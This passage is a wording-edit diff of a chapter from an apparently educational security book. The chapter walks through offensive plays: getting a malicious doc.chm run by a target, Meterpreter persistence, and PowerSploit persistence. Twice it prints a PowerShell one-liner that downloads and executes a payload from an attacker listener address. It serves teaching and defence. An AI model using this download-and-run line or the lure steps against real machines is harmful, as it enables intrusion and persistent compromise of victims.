holisticinfosec/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

     IEX ((new-object net.webclient).downloadstring('http://<listener-attack-ip>/payload.txt '))

 {icon=bomb}
-G> This does not get persisted, but we use the same file below in [Adding Persistence C/- PowerSploit](#vps-identify-risks-adding-persistence-co-powersploit) where the contents is persisted.
+G> This is not persisted, but we use the same file below in [Adding Persistence C/- PowerSploit](#vps-identify-risks-adding-persistence-co-powersploit) where the contents is persisted.
 G>
-G> Now you should see a `doc.chm` created in the folder that you ran the above command from.
+G> You should see a `doc.chm` created in the folder that you ran the above command from.
 G>
-G> Now you need to get the `doc.chm` onto your targets machine or a network share that your target can access/copy from, and persuade your target to run the `doc.chm`.
+G> Next, you need to get the `doc.chm` onto your target's machine, or a network share that your target can access/copy from, and persuade your target to run the `doc.chm`.
 When they do, the results will be the same as we saw in the [Powershell Exploitation with Psmsf](#powershell-exploitation-with-psmsf-play) play from above from where the target runs the virus.

 #### Adding Persistence C/- Meterpreter {#vps-identify-risks-adding-persistence-co-meterpreter}

-Metasploit had a Meterpreter script called [`persistence.rb`](https://www.offensive-security.com/metasploit-unleashed/meterpreter-service/) that could create a persistent (survive reboots, and most other actions a user will take) reverse shell, these scripts are no longer supported.
-If you try to use it, you will probably get an error like: "`windows version of Meterpreter is not supported with this Script`"
+Metasploit had a Meterpreter script called [`persistence.rb`](https://www.offensive-security.com/metasploit-unleashed/meterpreter-service/) that could create a persistent (survive reboots, and most other actions a user will take) reverse shell, but these scripts are no longer supported.
+If you try to use it, you will probably receive an error such as: "`windows version of Meterpreter is not supported with this Script`"

-Now the [`exploit/windows/local/persistence`](https://github.com/rapid7/metasploit-framework/issues/6904) module is recommended for persistence.
-AV picks this up on reboot though, so you probably will not get far with this.
+At present, the [`exploit/windows/local/persistence`](https://github.com/rapid7/metasploit-framework/issues/6904) module is recommended for persistence.
+AV picks this up on reboot though, so you probably will not get very far with this persistence mechanism.

 #### Adding Persistence C/- [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/) {#vps-identify-risks-adding-persistence-co-powersploit}

 We can do better than `meterpreter`.
-PowerSploit has a module called [Persistence](https://github.com/PowerShellMafia/PowerSploit/blob/master/Persistence/Persistence.psm1), and that is what we use in this play.
-This adds persistence to the PowerShell one liner that was embedded in the `psmsf` virus we created above, namely [`download-payload-execute`](#download-psmsf-payload-execute), and also used in the office document [attack with `nishang`](#powershell-exploitation-via-office-documents).
-The one liner was:
+PowerSploit has a module called [Persistence](https://github.com/PowerShellMafia/PowerSploit/blob/master/Persistence/Persistence.psm1), which we'll use in this play.
+This adds persistence to the PowerShell one-liner that was embedded in the `psmsf` virus we created above, namely [`download-payload-execute`](#download-psmsf-payload-execute), and also used in the Office document [attack with `nishang`](#powershell-exploitation-via-office-documents).
+The one-liner was:

 {title="persistentFetchRunPayload.ps1", linenos=off, id="persistentFetchRunPayload-ps1", lang=PowerShell}
     IEX ((new-object net.webclient).downloadstring('http://<listener-attack-ip>/payload.txt '))

-I had a play with the `nishang` [`Add-Persistence.ps1`](https://github.com/samratashok/nishang/blob/1b5aca1a1eb170befccf1d111e8902285d553289/Utility/Add-Persistence.ps1) script, which may be useful for creating post-exploitation persistence, but I was looking for a solution to create an atomic persistent exploit, which is what PowerSploit provides.
+I had a play with the `nishang` [`Add-Persistence.ps1`](https://github.com/samratashok/nishang/blob/1b5aca1a1eb170befccf1d111e8902285d553289/Utility/Add-Persistence.ps1) script, which may be useful for creating post-exploitation persistence, but I was looking for a solution to create an atomic persistent exploit, which is provided by PowerSploit.

 ![](images/HandsOnHack.png)

 I> ## Synopsis
 I>
-I> In this play we extend the [PowerShell Exploitation via Office Documents](#powershell-exploitation-via-office-documents) play with the help from PowerSploit.
-The play below should explain everything.
+I> In this play we extend the [PowerShell Exploitation via Office Documents](#powershell-exploitation-via-office-documents) play with help from PowerSploit.

 ![](images/PersistentPowerShell.png)